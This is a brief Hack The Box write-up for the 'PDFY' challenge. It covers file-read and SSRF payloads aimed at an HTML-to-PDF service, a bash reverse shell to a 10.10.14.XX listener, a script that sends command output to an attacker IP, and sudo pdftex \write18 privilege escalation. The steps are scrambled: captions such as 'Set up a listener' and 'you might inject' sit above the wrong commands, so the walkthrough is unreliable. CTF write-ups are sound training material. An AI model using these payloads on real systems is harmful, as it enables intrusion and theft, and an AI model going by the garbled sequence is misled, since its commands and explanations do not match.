PDFY HTB Writeup

<img src="file:///var/www/html/index.php">

From the source, you may find API endpoints, database credentials, or internal service ports. In PDFY, there is often a local service on port 8080 or 5000 that isn't exposed externally. After reading index.php, you might find a reference to:

<img src="http://127.0.0.1:8080/generate?html=<pre>$(bash -i >& /dev/tcp/10.10.14.XX/4444 0>&1)</pre>">

Set up a listener:

<img src="http://127.0.0.1:8080/generate?html=<iframe src='file:///etc/passwd' />">

But more effectively, if the internal service uses wkhtmltopdf --run-script or similar, you might inject:

sudo -l

You might see:

<script> document.write('<img src="http://your-ip:4444/?c=' + require('child_process').execSync('id') + '">'); </script>

However, for PDFY specifically, the working exploit often involves pdftex and \write18. After testing command injection, send a reverse shell payload.

(ALL) NOPASSWD: /usr/bin/pdftex

pdftex allows \write18 to execute shell commands if enabled.